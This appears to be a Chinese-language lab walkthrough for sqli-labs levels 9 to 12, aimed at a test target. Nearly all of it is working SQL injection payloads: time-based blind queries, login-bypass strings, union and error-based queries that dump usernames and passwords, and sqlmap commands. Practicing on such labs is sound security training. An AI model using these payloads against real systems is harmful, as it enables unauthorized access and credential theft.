Less-9 基于时间延时的单引号GET请求盲注
仅时间延时型盲注,跟Less-1是一样的,只是拼接的方式不一样,不管怎么输入都是显示You are in....... 所以只能时间型盲注 输入' or 1=1--+进行注入
手工延时注入
爆库
?id=1' and if(length(database())=8 , sleep(3), 1) --+ 这里的数字8从1试到8 发现执行到8的时候明显演示,那么可以确认目标靶机数据库是8个字符
?id=1' and if(left(database(),1)='s' , sleep(3), 1) --+ 然后这里就开始猜测每个字母,看是否是在执行的时候延时 可以猜出最终库名security
爆表
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(3), 1) --+ 慢慢猜一个一个字母猜,记得修改limit的位置数字和要被猜测的字母
爆字段
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 9,1),8)='username', sleep(3), 1) --+ 慢慢修改limit和要猜测的值
爆值
?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' , sleep(3), 1) --+ 慢慢修改limit和要猜测的
时间延时盲注
python sqlmap.py -u http://106.54.35.126/Less-9/?id=1 --proxy="http://127.0.0.1:8080" --dbms=MySQL --random-agent --flush-session --technique=T -v 3
=================================================================================================================================
Less-10 基于错误型POST请求单引号字符注入
仅时间延时型盲注,跟Less-9是一模一样的,只是拼接的方式不一样,不管怎么输入都是显示You are in....... 所以只能时间型盲注 输入" or 1=1--+进行注入
时间延时盲注
python sqlmap.py -u http://106.54.35.126/Less-10/?id=1 --proxy="http://127.0.0.1:8080" --dbms=MySQL --random-agent --flush-session --technique=T -v 3
=================================================================================================================================
Less-11 基于错误POST请求单引号字符型注入
这里是POST请求的注入,也是经典的万能密码注入点,具体看看下面的注入方式
通过注释密码进行成功注入登陆 mysql注释的两种方式 --+或者# --这个后面有时候也可以是空格,推荐使用+,稳定靠谱
uname=admin'--+&passwd=bmfx&submit=Submit (注入这里必须用户名是admin,密码不写或者随便输入都可以)
uname=admin'#&passwd=bmfx&submit=Submit (注入这里必须用户名是admin,密码不写或者随便输入都可以)
通过构造查询语句永恒为真进行注入登陆
uname=bmfx&passwd=shit' or 998--+&submit=Submit (注入这里用户名和密码随便输入都可以,前提是构造永恒条件然后注释后面的语句段)
uname=bmfx&passwd=shit' || 998--+&submit=Submit (注入这里用户名和密码随便输入都可以,前提是构造永恒条件然后注释后面的语句段)
uname=bmfx&passwd=shit' or 998#&submit=Submit (注入这里用户名和密码随便输入都可以,前提是构造永恒条件然后注释后面的语句段)
uname=bmfx&passwd=shit' || 998#&submit=Submit (注入这里用户名和密码随便输入都可以,前提是构造永恒条件然后注释后面的语句段)
# 闭合后面语句 并 添加一个永真条件
uname=bmfx&passwd=shit' or '998' = '998&submit=Submit (注入这里用户名和密码随便输入都可以,前提是构造永恒条件然后闭合后面的语句段)
uname=bmfx&passwd=shit' || '998' = '998&submit=Submit (注入这里用户名和密码随便输入都可以,前提是构造永恒条件然后闭合后面的语句段)
上述测试的过程中使用burpsuite测试效果非常好,使用hackbar测试有问题
联合查询注入
uname=admin&passwd=bmfx'union select 1,(SELECT GROUP_CONCAT(username,password) FROM users)#
报错注入
uname=bmfx&passwd=bmfx'AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&submit=Submit
或者
uname=bmfx&passwd=bmfx' AND (SELECT 1 FROM(SELECT count(*),CONCAT((SELECT (SELECT (SELECT CONCAT(0x7e,0x27,cast(username AS CHAR),0x27,0x7e) FROM users LIMIT 3,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1#&submit=Submit
sqlmap注入
POST /Less-11/ HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-11/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
uname=bmfx&passwd=shit&submit=Submit
联合查询注入
python sqlmap.py -r less11.txt --dbms=MySQL --random-agent --flush-session --technique=U -v 3 --dbs --batch
报错注入
python sqlmap.py -r less11.txt --dbms=MySQL --random-agent --flush-session --technique=E -v 3 --dbs --batch
布尔盲注
python sqlmap.py -r less11.txt --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --dbs --batch
时间延时盲注
python sqlmap.py -r less11.txt --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --dbs --batch
这里也是可以使用--data参数
python sqlmap.py -u http://106.54.35.126/Less-11/?id=1 --data="uname=bmfx&passwd=shit&submit=Submit" -p "uname" --dbms=MySQL --random-agent --flush-session --technique=U -v 3
==============================================================================================================================
Less-12 基于错误POST请求双引号字符型注入
这里是POST请求的注入,理论是跟Less-11是一样的,只是闭合方式是双引号,但是看实际代码发现是带有括号,而且使用注释--+和#都不行,那么这里不适用注释,只能做到前面闭合,中间查询语句,后面报错
报错注入
爆库
uname=bmfx" and extractvalue(1,concat(0x7e,(select database()))) and "&passwd=bmfx&submit=Submit
爆表
uname=bmfx" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and "&passwd=bmfx&submit=Submit
爆字段
uname=bmfx" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and "&passwd=bmfx&submit=Submit
爆字段值
uname=bmfx" and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users))) and "&passwd=bmfx&submit=Submit
联合查询注入
爆库
uname=bmfx") union select 1,database() --+&passwd=bmfx&submit=Submit
爆表
uname=bmfx") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--+&passwd=bmfx&submit=Submit
爆users表中的字段
uname=bmfx") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&passwd=bmfx&submit=Submit
爆数据
uname=bmfx") union select 1,(SELECT GROUP_CONCAT(username,password) FROM users) --+&passwd=bmfx&submit=Submit
这里可以使用万能密码admin")#